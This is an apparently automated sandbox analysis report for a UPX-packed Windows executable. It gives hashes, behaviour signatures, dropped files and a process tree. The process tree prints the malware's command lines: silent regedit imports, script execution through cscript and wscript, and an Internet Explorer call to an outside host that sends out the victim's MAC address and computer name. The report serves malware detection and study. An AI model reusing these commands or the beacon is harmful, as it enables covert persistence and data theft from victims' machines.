Overview

overview

8

Static

static

8

a85f978307...a0.exe

windows7-x64

8

a85f978307...a0.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    185s
  • max time network
    196s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    03-10-2022 07:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe

  • Size

    31KB

  • MD5

    6e9f388f90ef2c3cb21e43a1caa97604

  • SHA1

    06f497d9b24c2316cc1f2a2f4e1271e7c53c2ae6

  • SHA256

    a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0

  • SHA512

    b124bae32a984b455b871e47944f8c520236d8f44850ac90c0f727e5b5d04b57352a8fb082bb1a4deccc553353690dfd2c75f9059a8f2e845c8af07c54670378

  • SSDEEP

    768:Vn1eOBcaAtWQtmNukzaUg43B3JQPfbcG1Tiyb2:VnJwWQt+qI3wbcr

Score
8/10
upx

Malware Config

Signatures

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Deletes itself 1 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 29 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe
    "C:\Users\Admin\AppData\Local\Temp\a85f97830728f6474ddc54f283cc52e72534e63d610843a34ab2b0b11ad621a0.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1176
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c regedit /s "C:\Program Files\Common Files\tk.reg"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1336
      • C:\Windows\SysWOW64\regedit.exe
        regedit /s "C:\Program Files\Common Files\tk.reg"
        3⤵
        • Modifies registry class
        • Runs .reg file with regedit
        PID:2040
    • C:\Windows\SysWOW64\Cmd.exe
      Cmd.exe /c CScript /nologo "c:\windows\pack.wsf" "c:\windows\1_qrytmimya.olade" >> "c:\windows\qrytmimya.olade"
      2⤵
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:1700
      • C:\Windows\SysWOW64\cscript.exe
        CScript /nologo "c:\windows\pack.wsf" "c:\windows\1_qrytmimya.olade"
        3⤵
          PID:896
      • C:\Windows\SysWow64\WScript.exe
        "C:\Windows\SysWow64\WScript.exe" "C:\windows\qrytmimya.olade"
        2⤵
          PID:964
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" http://u.5136688.com/setuptj.asp?a_ip=&a_mac=C6:F5:4D:74:98:C3&a_cpname=ZERMMMDR&a_user=me&a_locip=0.0.0.0
          2⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1372
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1372 CREDAT:275457 /prefetch:2
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:1136
        • \??\c:\windows\SysWOW64\wscript.exe
          c:\windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\Killme.vbs
          2⤵
          • Deletes itself
          PID:1796

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Program Files\Common Files\tk.reg
        Filesize

        4KB

        MD5

        d672124da874aa8010dee22ca7963ed6

        SHA1

        bffa44a6c0d14cb665d006600f6b55535a19c933

        SHA256

        22d8954300ed4663e74478d89602ba0e0ef3734411cd782979506b655012ad74

        SHA512

        33c7af8bc6a8460156dad05f483904b2ad9ff3b49d3c31ae8d405f878a60afec7083b31b8e76ff03eeb36150d89d3df5bae035e688dff0c1bd9d0f12154e6e30

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Killme.vbs
        Filesize

        307B

        MD5

        afff93f898e03d9b64b1e052fcdcef7d

        SHA1

        ac306b8a8e85949943b53900d82cfd2ba4f7df1a

        SHA256

        ff316f964a1b0e12b5dd359911c44ccb911d5f22f7359de7b916fdce6b5393c5

        SHA512

        0d347643edeb07a386ec5ff3ee7a9264896abbaa6ffc6cf3e3edad5df3d66ae079a3b03e3e1f6ade0feb4d6488e2d42dfe55450cc7540e95a93631a4a2e287a3

        Download Submit

      • \??\c:\windows\1_qrytmimya.olade
        Filesize

        48KB

        MD5

        3e21a85691c23cd289de713f522cd90e

        SHA1

        d599e6a053737248a907dc3df96f14c97453cf5c

        SHA256

        eb6cfc50a02c440b62c088a1e783c435773ed43cbe7f3825d1bb3a8a5464cbfb

        SHA512

        50974d14500cb03cfdfcad9d80ffd64a6f9ecf441f6a0a9b38c3f6be67c3d222bc200e109e9b5252c6a9d369433e438ee8ac0f5f01ebdd78d5e17a7b64479c4b

        Download Submit

      • \??\c:\windows\pack.wsf
        Filesize

        8KB

        MD5

        a83fdf4f29a7e978d33eeb3674df531b

        SHA1

        60ea7b41816bc2044a6224e38352e56667d3d5ed

        SHA256

        f85f16fb946e6b4d7ef4f6523276a52b4a68d04bdf340312adc2ccdef4cee845

        SHA512

        7ad293f3032054c7e55e89a558dde1e4465c31c1c9fd612e3f56fc209b40826af5273fe140273cf467a96dcda805f13844fa6244cbe2e113bfcf131117acdbd0

        Download Submit

      • \??\c:\windows\qrytmimya.olade
        Filesize

        37KB

        MD5

        db8007df67d4685885b7ee67083bd60d

        SHA1

        fdf001ab1a95326d3e1ef41129bc357f05e3c109

        SHA256

        2c026ad5ce49fb8d68a64177e56b915e6dbfbaaaca43dc7c13b8242bf8fe64cd

        SHA512

        85713368cbf631f623079668f9b3caa87bb8899b1afeb14dafcf25ca892170f609a11c721815e66a45731b2f57b07ee7bd19cc23a78b5dc550047ce211ebdc91

        Download Submit

      • memory/1176-57-0x0000000000400000-0x000000000042A000-memory.dmp

        Filesize

        168KB

        Download

      • memory/1176-72-0x0000000000400000-0x000000000042A000-memory.dmp

        Filesize

        168KB

        Download

      • memory/1176-54-0x0000000000400000-0x000000000042A000-memory.dmp

        Filesize

        168KB

        Download

      • memory/2040-60-0x0000000075091000-0x0000000075093000-memory.dmp

        Filesize

        8KB

        Download